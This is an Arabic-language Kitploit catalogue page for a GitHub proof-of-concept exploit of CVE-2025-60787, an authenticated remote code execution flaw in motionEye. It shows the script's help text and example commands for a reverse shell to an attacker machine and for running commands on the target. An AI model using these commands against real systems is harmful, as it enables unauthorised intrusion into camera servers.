Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60787 — PoC لـ CVE-2025-60787 - ثغرة RCE موثّقة في motionEye لجميع الإصدارات حتى 0.43.1b4 (متضمنًا) | Kitploit
أدوات/GitHubGitHub/gunzf0x/cve-2025-60787
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

PoC لـ CVE-2025-60787 - ثغرة RCE موثّقة في motionEye لجميع الإصدارات حتى 0.43.1b4 (متضمنًا)

عرض المستودع
101منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60787 - RCE موثقة في motionEye

PoC لـ CVE-2025-60787 وهي ثغرة RCE موثقة لـ motionEye مع جميع الإصدارات المتأثرة حتى 0.43.1b4 (مشمولة).

هذا PoC آلي للثغرة الموصوفة في هذا المستودع. الشكر لـ prabhatverma47.

الاستخدام

يحتوي السكربت على أمرين يستغلان الثغرة. الأول يرسل شل عكسي مباشر يسمى revshell والآخر يسمى command لتنفيذ الأوامر مباشرة باستغلال هذا CVE.

root@kitploit:~
❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

الشل العكسي

استخدم الأمر revshell للحصول على شل. على سبيل المثال:

root@kitploit:~
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

حيث 10.10.10.10 هي الجهاز الهدف (الجهاز الذي يعمل عليه motionEye)، و 10.10.10.15 هو جهاز المهاجم الخاص بنا، و 9001 هو المنفذ الذي نستمع عليه لاستقبال شل عكسي.

تنفيذ الأوامر

إذا أردنا بدلاً من الشل العكسي تنفيذ أوامر أخرى عن بعد، يمكننا استخدام الخيار command. على سبيل المثال، تنفيذ الأمر ping -c1 10.10.10.15 على الجهاز الضحية:

root@kitploit:~
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

حيث 10.10.10.10 هو الجهاز الذي يعمل عليه motionEye.

إخلاء مسؤولية

استخدم هذا السكربت دائمًا تحت مسؤوليتك الخاصة.

كن أخلاقيًا (:

تنزيل الأداة